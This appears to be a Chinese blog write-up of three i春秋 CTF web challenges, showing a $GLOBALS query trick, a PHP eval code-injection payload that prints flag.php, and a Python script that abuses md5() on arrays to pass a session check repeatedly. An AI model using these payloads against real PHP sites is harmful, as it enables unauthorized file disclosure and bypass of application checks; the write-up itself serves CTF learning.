i春秋 ctf web

爆破-1

全局变量$GLOBALS
?hello=GLOBALS

爆破-2

命令注入
?hello=);show_source('flag.php');//

eval( "var_dump($a);");
eval( "var_dump();show_source('flag.php');//);");

爆破-3

目标
$_SESSION['nums']>=10
条件
if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
  $_SESSION['nums']++;

md5()如果参数是数组则返回0
第一次请求参数为value[]=e&value[]=a

#coding=utf-8
import requests

url='http://82991386f7a64ea09ecc9545b8ac8bc0c42e0a4155474630.game.ichunqiu.com?value[]=e&value[]=a'
r=requests.get(url)
cookies={'PHPSESSID':r.headers['Set-Cookie'][10:36]}#获得会话id
for i in xrange(11):
    url='http://82991386f7a64ea09ecc9545b8ac8bc0c42e0a4155474630.game.ichunqiu.com?value[]={0}&value[]={1}'.format(r.content[0:1],r.content[1:2])
    print url
    r=requests.get(url,cookies=cookies)
    if i==10:
        print r.content

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 爆破1,2,3 看似是爆破,其实可以直接GLOBALS查看所有的全局变量,其实考的是文件包含,六位字符的爆破实在是...
    V0W阅读 1,763评论 0 0
  • 分析 打开url,发现是一个读取文件的过程,一开始还以为是文件包含,其实直接读文件即可: 读了一下index.ph...
    V0W阅读 2,181评论 1 0
  • WEB2 看源代码得flag 文件上传测试 找一张图片上传,截包改后缀名为.php得flag 计算题 F12修改输...
    a2dd56f6ad89阅读 18,546评论 0 2
  • 你驾着月而来 追求自由自在 你用太阳的眼 在黑夜里寻找着未来
    东方愚阅读 333评论 0 2
  • 拿到驾照了,开心~
    几近光明阅读 168评论 0 0